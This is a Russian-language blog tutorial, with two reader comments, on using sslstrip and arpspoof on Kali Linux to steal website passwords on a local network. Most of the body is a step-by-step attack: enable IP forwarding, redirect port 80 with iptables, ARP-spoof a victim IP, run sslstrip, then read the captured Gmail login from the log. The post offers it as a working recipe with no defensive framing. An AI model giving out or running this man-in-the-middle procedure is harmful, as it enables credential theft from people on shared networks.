Kali Linux: Используем sslstrip для перехвата пароля
в разделе: Open Source- Просмотров: 26911
- Подписаться на обновления
Утилита sslstrip перехватывает http-трафик с компьютера в локальной сети и таким образом позволяет нам разузнать пароли от каких-нибудь сайтов. Как же пользоваться этой утилитой?
Для начала откроем терминал и выполним команду sslstrip -h для того чтобы узнать все опции утилиты.
Перед тем как начать работать с sslstrip нам нужно проделать кое-какие действия
1. Нам нужно включить IP Forwarding
echo ‘1’ > /proc/sys/net/ipv4/ip_forward
2. Включить перенаправление запросов с порта 80 на 8080
iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 8080
3. Определяем наш шлюз netstat -nr
4. Выясняем ip-адрес жертвы (в моем случае это компьютер под управлением Windows XP с IP-адресом 192.168.71.128)
5. Перенаправляем весь http-трафик с нашего компьютера на шлюз
arpspoof –i eth0 –t 192.168.71.128 –r 192.168.71.2
Теперь, не закрывая этого окна терминала, открываем еще одно, и запускаем в нем прослушку порта 8080 с помощью sslstrip:
sslstrip –l 8080
Теперь, я на компьютере жертвы захожу в гугло-почту:
После того как я зашел в почту, на компьютере с Kali Linux в окне терминала с работающим sslstrip нажимаю ctrl+c для отмены операции. Вся полученная информация будет сохранена в файл sslstrip.log
Посмотрим содержимое файла:
cat sslstrip.log - логин и пароль обведены в красную рамку
Вот так это все работает, удачи!
-
Вторник, 15 Декабрь 2015
Я правильно понял. что если я напишу https://gmail.com , то никакой sslstrip ничего не поймает? Тут важно, чтобы пользователь сначала именно http -запрос ввел, а не https
-
Для создания комментария войдите пожалуйста сначала в сайт с именем пользователя и паролем .
Вот только я не вдуплил как узнать IP жертвы то?